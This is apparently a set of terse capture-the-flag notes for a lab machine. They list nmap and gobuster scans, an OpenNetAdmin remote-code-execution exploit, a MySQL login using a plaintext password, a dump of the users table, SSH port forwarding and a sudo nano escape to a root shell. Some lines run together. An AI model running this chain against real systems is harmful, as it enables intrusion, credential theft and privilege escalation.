sudo nmap -sC -sV 10.10.10.171 -oA nmap/10.10.10.171
gobuster dir -u "http://10.10.10.171/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out -x html -b 403,404
python3 ona-rce.py check http://10.10.10.171/ona/
python3 ona-rce.py exploit http://10.10.10.171/ona/
cat /etc/passwd
mysql -u ona_sys -p
n1nj4W4rri0R!
show databases;
use ona_default;show tables;
select * from users;
su jimmy
/etc/apache2/sites-available/internal.conf
die()
function
ssh -L 52846:localhost:52846 jimmy@10.10.10.171
die()
function so we can view main.php with out auth by Burp Suitesudo -l
/bin/nano /opt/priv
by root privilagesudo /bin/nano /opt/priv
^R^X
(ctrl+r ctrl+x)reset;; sh 1>&0 2>&0